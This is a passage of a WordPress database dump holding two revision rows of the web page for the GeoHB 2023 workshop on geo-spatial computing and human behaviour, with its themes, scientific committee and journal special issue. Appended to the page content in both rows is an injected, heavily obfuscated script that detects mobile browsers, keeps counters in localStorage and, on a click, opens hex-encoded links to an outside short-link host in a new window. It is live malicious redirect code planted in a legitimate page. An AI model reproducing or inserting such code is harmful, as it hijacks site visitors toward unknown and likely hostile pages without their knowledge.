Remote Sensing</li>\n<li>WG IV/6: Human Behaviour and Spatial Interactions</li>\n</ul>\n<p>&nbsp;</p>\n<h5></h5>\n<h5></h5>\n<h5><strong>Special Issue for the workshop:</strong></h5>\n<p>The authors of selected papers in the workshop will be invited to submit an extended full paper to the Transactions in GIS (<a href=\"https://onlinelibrary.wiley.com/journal/14679671\">https://onlinelibrary.wiley.com/journal/14679671</a>; current impact factor: 2.568). The selected papers will go through the peer-review process of the journal.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GeoHB 2023: Geo-Spatial Computing for Understanding Human Behaviours','','inherit','closed','closed','','2791-revision-v1','','','2023-01-07 14:10:57','2023-01-07 14:10:57','',2791,'https://gsw2023.com/?p=3536',0,'revision','',0),
(3537,1,'2023-01-07 14:11:21','2023-01-07 14:11:21','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2816\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Urban spaces have become complex, being shaped by diverse human behaviours. Therefore, the sustainability of development has faced various challenges ranging from pollution to equity in accessibility to activity spaces and opportunities. Using spatial big data and new computing technologies is an effective way to a better understanding of the interaction between individuals and urban environments, which would be beneficial to tackle urban challenges. This workshop focuses on new advanced technologies on spatial data representation and interoperability, geo-computation and -simulation, and GeoAI, which can harness human behaviour related spatial big data, discovering the mechanisms of the interaction between human behaviours and urban environments.</strong></h5>\n<p>[/vc_column_text][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"49\"][vc_row_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5></h5>\n<h5><strong>Themes of event:</strong></h5>\n<ul>\n<li>Geo-computation and geo-simulation models for understanding human mobility patterns and underlying mechanisms of the interactions between human behaviours and urban environments</li>\n<li>Computational time geographical methods for modelling and representing human activity-travel behaviour</li>\n<li>Spatio-temporal data mining methods for uncovering human behaviour and its interactions with urban environments</li>\n<li>Knowledge-based geo-computation for reasoning human behaviour contexts</li>\n<li>GeoAI-based technique for sensing urban environments using spatio-temporal big data</li>\n<li>Computational methods for analysing individual and collective behaviour uncertainties within complex systems</li>\n<li>Reliability-based measures for quantifying accessibility under behavioural and environmental uncertainties</li>\n<li>Reliable geo-computation methods for optimizing activity-travel scheduling under uncertainties</li>\n<li>Conceptual models for human behaviour related spatial data representation and associated data such as time series.</li>\n<li>Use case of international standards to foster scalability and reusability of solutions for human mobility big data.</li>\n<li>New solutions for effective and meaningful spatial data integration for human activity pattern study</li>\n<li>Geo-visualization and spatial representation methods of spatio-temporal big data on human mobility</li>\n<li>New developments of strategies and automated computational approaches for handling geo-privacy and ethical issues involved in the analysis of and use of individuals’ spatial data</li>\n</ul>\n<h5></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><strong>Scientific Committee:</strong></h5>\n<ul>\n<li>Pawel Boguslawski, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Elisabetta Colucci, Politecnico di Torino, Italy</li>\n<li>Chen-Chieh Feng, National University of Singapore, Singapore</li>\n<li>Rui Zhu, Agency for Science, Technology and Research, Singapore</li>\n<li>James Haworth, University College London, UK</li>\n<li>Tao Jia, Wuhan University, China</li>\n<li>Xiao Li, University of Oxford, UK</li>\n<li>Chun Liu, Tongji University, China</li>\n<li>Xintao Liu, The Hong Kong Polytechnic University, China</li>\n<li>Francesca Noardo, Open Geospatial Consortium</li>\n<li>Azarakhsh Rafiee-Voermans, Delft University of Technology, Netherlands</li>\n<li>PWitold Rohm, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Shih-Lung Shaw, University of Tennessee, Knoxville, USA</li>\n<li>Katarzyna Sila-Nowicka, University of Auckland, New Zealand</li>\n<li>Noam Shoval, Hebrew University of Jerusalem, Israel</li>\n<li>Donggen Wang, The Hong Kong Baptist University, China</li>\n<li>Martin Werner, Technical University of Munich, Germany</li>\n<li>René Westerholt, Technical University of Dortmund, Germany</li>\n<li>Hangbin Wu, Tongji University, China</li>\n<li>Marco Minghini, European Commission - Joint Research Centre (JRC), Italy</li>\n</ul>\n<h5></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><strong>Supporting ISPRS Working Groups:</strong></h5>\n<ul>\n<li>WG IV/1: Spatial data representation and interoperability</li>\n<li>WG IV/3: Geo-computation and geo-simulation</li>\n<li>ICWG IV/III/II: Openness in Geospatial Science and Remote Sensing</li>\n<li>WG IV/6: Human Behaviour and Spatial Interactions</li>\n</ul>\n<p>&nbsp;</p>\n<h5></h5>\n<h5></h5>\n<h5><strong>Special Issue for the workshop:</strong></h5>\n<p>The authors of selected papers in the workshop will be invited to submit an extended full paper to the Transactions in GIS (<a href=\"https://onlinelibrary.wiley.com/journal/14679671\">https://onlinelibrary.wiley.com/journal/14679671</a>; current impact factor: 2.568). The selected papers will go through the peer-review process of the journal.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GeoHB 2023: Geo-Spatial Computing for Understanding Human Behaviours','','inherit','closed','closed','','2791-revision-v1','','','2023-01-07 14:11:21','2023-01-07 14:11:21','',2791,'https://gsw2023.com/?p=3537',0,'revision','',0),
